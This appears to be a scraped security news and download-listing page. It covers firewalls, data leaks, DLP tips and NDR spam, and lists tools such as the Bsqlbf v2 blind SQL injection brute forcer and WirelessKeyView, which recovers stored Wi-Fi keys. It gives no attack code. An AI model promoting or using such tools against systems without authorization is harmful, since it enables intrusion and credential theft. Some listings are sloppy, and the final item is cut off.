  • Identifying – Microsoft Source Code Analyzer for SQL Injection - A SQL Source Code Analysis Tool has been developed. This tool can be used to detect ASP code susceptible to SQL injection attacks

What firewalls do and don’t do

Over the last few years, security threats to companies have grown and altered dramatically and so have the defences. Traditional firewalls, installed over three years ago, are often not best suited for current threats and don’t protect against a number of newer threats.

What firewalls do

A firewall is a system designed to prevent unauthorised access to or from a private computer network. Firewalls are frequently used to prevent unauthorised Internet users from accessing private networks connected to the Internet (often described as intranets). All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

You need a firewall to protect your confidential information from those not authorised to access it and to protect against malicious users and accidents that originate outside your network. One of the most important elements of a firewall is its access control features, which distinguish between good and bad traffic.

There are various types of firewall. In ascending order, they are:

* Packet layer
This analyses network traffic at the transport protocol layer.

* Circuit level
This validates that packets are either connection or data packets.

* Application layer
This ensures valid data at the application level before connecting.

* Proxy server
This intercepts all messages entering or leaving the network.

In the real world, threats have evolved over the years and firewalls have evolved to deal with them. While it is still possible to buy packet only firewalls, they are not adequate for business use. Protection against combination threats is best provided by firewalls which combine all of the above elements.

Specific functions performed by firewalls include:
* Gateway defence
* Carrying out defined security policies
* Segregating activity between your trusted network, the Internet and your DMZ ( a protected zone midway between your network and the Internet, where you would perhaps have your web or email server).
* Hiding and protecting your internal network addresses (NAT)
* Reporting on threats and activity.

What firewalls don’t do

Even with a firewall, there are still many areas of risk for your network. The most obvious is malware. Malware is a combination of the words ‘malicious’ and ‘software’ and includes viruses, trojan horses, worms, spyware/adware, phishing and pharming. Malware is most commonly acquired through clicking on email attachments and email links.

Viruses, trojans and worms can cause a range of symptoms from the annoying and/or embarrassing to the much more serious which can affect the functioning of your business. Spyware/adware gathers information about you. It can record keystrokes and, as such, can potentially be very dangerous, revealing everything you do on your computer,

Another well-known threat, not covered by your firewall, is SPAM. Dealing with SPAM can seriously affect your productivity and, as SPAM often contains viruses and phishing emails, it is also a direct security threat.

Phishing is about fake emails trying to extract sensitive information, such as your bank passwords or credit card details and a variation of this is pharming, where the criminal sets up a fake web site which looks like one you normally use, typically a banking site. Once you enter your details, the criminal is able to plunder your account.

Many people are also unaware that you can actually acquire malware by simply browsing web sites. This is a rapidly growing threat and some of the malware is used to create Botnets (see below). Some security applications (e.g. those from Finjan) have a facility which protects you against web sites containing malware, by checking the sites before you click on them.

Another danger to your network is from a DDoS (distributed denial of service) attack. This is a malicious attempt to prevent an organisation being able to use its Internet based systems by flooding them with emails until the servers are overwhelmed. These attacks are often carried out by BotNet networks of compromised PCs, which are also used in SPAM campaigns. Specific DDoS software can guard against this threat.

Other dangers to your network include unauthorised access, and the way to deal with this is to have proper authentication procedures in place, for both local and remote access. In many cases, passwords are not enough and the use of strong authentication with tokens provides much better security.

Further potential problems are from data theft or leakage, for example when a laptop is stolen. The answer here is to encrypt all sensitive data. Low cost solutions are available from companies such as Utimaco. Finally all wireless use is risky and requires a specific wireless firewall, and wireless VPN for remote access.

A firewall is no longer enough to protect a company network. Other security solutions to combat the threats outlined above are also necessary, as well as proper staff training.

One of the best ways to protect against the main threats not covered by a firewall is to use a UTM (unified threat management) device. UTM devices are multi-purpose security solutions which have a minimum of a firewall, VPN, anti-virus and intrusion detection/prevention. Some UTMs (sometimes known as super UTMs) also incorporate capabilities such as web filtering (blocking problematic web sites), SPAM blocking and spyware protection.

UTMs are usually lower cost than buying and installing several security components separately. They are also typically greener, as one solution uses much less power than multiple solutions. When buying a UTM or a super UTM, it is important to ensure that your reseller sizes it correctly i.e. ensures that it has the performance capability to deal with current throughput and future business expansion.

Data leaks are a top concern

Trend Micro reported that data leaks are becoming a leading source of headaches for U.S., U.K., German and Japanese companies, according to the results of a study that explores corporate computer users' perceptions of and experiences with security threats.

The study, which surveyed 1600 corporate end users found that the loss of proprietary company data and information was ranked as the second most serious threat at work, following viruses. It was considered to be more serious than most other threats such as spam, spyware and phishing. Many of those surveyed pointed the finger when it comes to corporate data leaks: While 6 percent of end users admitted to having leaked company information, 16 percent believe other employees caused data leaks. End users in the U.S., U.K., and Germany are more likely to admit to leaking company data, either intentionally or accidentally, than end users in Japan.

Respondents in the U.S. seem to believe they're slightly savvier when it comes to confidentiality - 74 percent of respondents say they know what type of company data is confidential and proprietary compared to 67 percent in the U.K., 68 percent in Germany, and only 40 percent in Japan. On the other hand, end users of large companies in Japan are more aware of what type of company data is confidential compared to end users of smaller organizations. Mobile users are also more confident. In the U.S., for example 79 percent of mobile end users say they know what's classified information compared to 69 percent of desktop computer users.

The study also found that approximately 46 percent of companies do not currently have a policy to prevent data leaks. Companies in Germany and Japan are more likely than UK companies to implement data leak prevention policies. In all countries surveyed, large organizations are more likely to have preventative policies in place than small companies.

Among end users whose company currently has a policy to prevent data leakage, more U.S. end users (nearly 70 percent) report to have received training compared to the other countries, especially in the U.K. where only 57 percent of end users said they received training. In all countries surveyed installation and use of security software are the most common actions taken to combat data leakage.

Security Tips..

As the number of vacationers taking their laptops and devices poolside increases, so do the risks to corporate data. These devices often contain confidential corporate information that could be seriously compromised if the devices were lost or stolen. This is a pertinent issue for corporations whose employees are accessing sensitive data while on vacation and may inadvertently leave the device behind.

In order to truly ensure the security of confidential data -- even when it is out of the office and going along for the family vacation -- effective DLP strategies and policies need to be deployed.

Safend has devised the top-five tips for ensuring that your employees' 'connected vacations' don't equate to data leaks and corporate headaches.
These tips include:
  • Written Data Security Policies: Effective policies governing access to confidential data is step one in making sure critical data remains in the office even when employees are poolside.
  • Access Control: Put measures in place to know who is allowed to access what data -- in the office or in Venice. For example, only allow files of a certain size and/or certain file types to be copied to thumb drives and other removable media, or only allow data to be copied to a specific device by serial number.
  • Encrypt Everything: Once your files are flying with you to Mexico via your USB stick, encryption is essential to ensure that unauthorized parties can't read them, even if your laptop or device gets lost in baggage claim.
  • Secure Connections: Not every WiFi hot spot around the globe is equipped with the necessary security to ensure your data's integrity. Restricting wireless port access helps avoid sensitive data from being pilfered while you sip your latte, awaiting a connecting flight.
  • Necessities Only: Just like that extra swimsuit, do you really need your laptop, USB stick and flash drive? The best way to keep data safe is to only take what you absolutely need.

WirelessKeyView 1.15

WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.

Plattform
Win

Language
English

Download Link
9d7ec263366a0e46ad5ffba4017abda7.zip (40.871 KB)

Beyond the hack: protect yourself from sniffing in LAN/WiFi

-Presents a zen based description on security and Sniffer risks that pose while using internet in LAN - WiFi based environment.
-Proof of concept by sniffing plaintext passwords.
-How important is cryptography for the normal user. Why he/she should adopt it.
-The Article is written in non technical and lucid lang.

Plattform


Language
English

Download Link
6f63c22a0cee28d7055ed320f9e6a8e0.pdf (340.429 KB)
http://www.greyhatindia.com

Data Guardian 1.3.9

Data Guardian is a secure, Universal Binary, database application for storing passwords, credit card numbers, adressses, notes, customer databases, and more. With up to 448-bits of encyrption, and integration with Keychain for auto-form-filling, it is a perfect solution for the web-savvy user as well.

Plattform
Win

Language
English

Download Link
92c001846e1eeafd076b34b9bfeca246.exe (5253.494 KB)

Generic Security Service 0.0.23

Generic Security Service (GSS) is an implementation of the Generic Security Service API (GSSAPI). It is used by network applications to provide security services, such as authenticating SMTP/IMAP, via the GSSAPI SASL mechanism. It consists of a library and a manual, and a Kerberos 5 mechanism that supports mutual authentication and the DES and 3DES ciphers.

Plattform
Win

Language
English

Download Link
357f4c24834320ee097a3f6bde74ce04.gz (1515.681 KB)

TCP/IP library 5.0

Komodia's TCP/IP library V4.0 (free, open source) is a unique combination of a security oriented library that allows the user to create arbitrary TCP/UDP/IP packets, and a complete communication library solution (for TCP/UDP/ICMP).

Plattform
Win

Language
English

Download Link
8e19ea4d002508c26978d443e554c335.zip (717.301 KB)

VBOLock 4

BOLock is easy to use, easy to implement, powerful copy protection for all of your Visual Basic, Delphi and C++ Builder software applications.

VBOLock binds software protection to your applications and requires very little technical knowledge. This is ideal for the non-technical user or for a developer pushed to meet the closing deadline of a release.

Plattform
Win

Language
English

Download Link
21132bc59ee6ddc5ce7ef83d1014dd83.zip (5121.951 KB)

7/2/08

NDR or Backscatter Spam - How Non Delivery Reports Become a Nuisance

You might remember a while ago we mentioned MP3 spam, which in October last year was the latest evolution in spam.

Currently there is a new type annoying mail-server owners the world over, it’s known as NDR or Backscatter Spam and involved NDRs or Non Delivery Reports (those emails you get when you send a mail to a non-working or no longer active account).

Research shows that up to 90% of emails received by companies are spam, and spammers have adopted a variety of methods to bypass spam filters used in anti-spam software. In the beginning, spam was mainly text based but over the past few years, spammers have resorted to using embedded images and attaching common file types such as mp3s and Excel documents in emails to gain access to mailboxes. Another option is NDR or non-delivery report spam.

NDRs are a common part of email exchanges. Users receive NDRs, for example, when an email does not arrive at a recipient’s address and notification is sent to the sender. However, spammers can cause a considerable increase in NDR activity because they send junk mail to thousands of email addresses. Some are genuine but others are not and these are used to generate NDR messages by manipulating the ‘From’ address to use a real domain sender. This results in email users receiving NDRs from people they had never sent an email to in the first place.

This white paper explains what NDR spam is and how administrators can take effective measures to reduce the impact on their email servers.

To download a copy of the white paper, please visit:
http://www.gfi.com/whitepapers/ndr-spam.pdf [PDF]

Bsqlbf V2 - Blind SQL Injection Brute Forcer Tool

There are quite a lot of SQL Injection Tools available and now there is one more to add to the stable for testing - Bsqlbf V2, which is a Blind SQL Injection Brute Forcer.

The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind sql injection against a mysql backend database, this new version supports blind sql injection against the following databases:
MS-SQL
MY-SQL
PostgreSQL
Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.

It supports 2 modes of attack:
Type 0: Blind SQL Injection based on True And Flase response
Type 1: Blind SQL Injection based on True And Error Response(details)

You can download Bsqlbf V2 here:
bsqlbf-v2.1.zip

Or read more here.

How to Change JKS KeyStore Private Key Password

Use following keytool command to change the key store password >keytool  -storepasswd  -new [new password ]  -keystore  [path to key stor...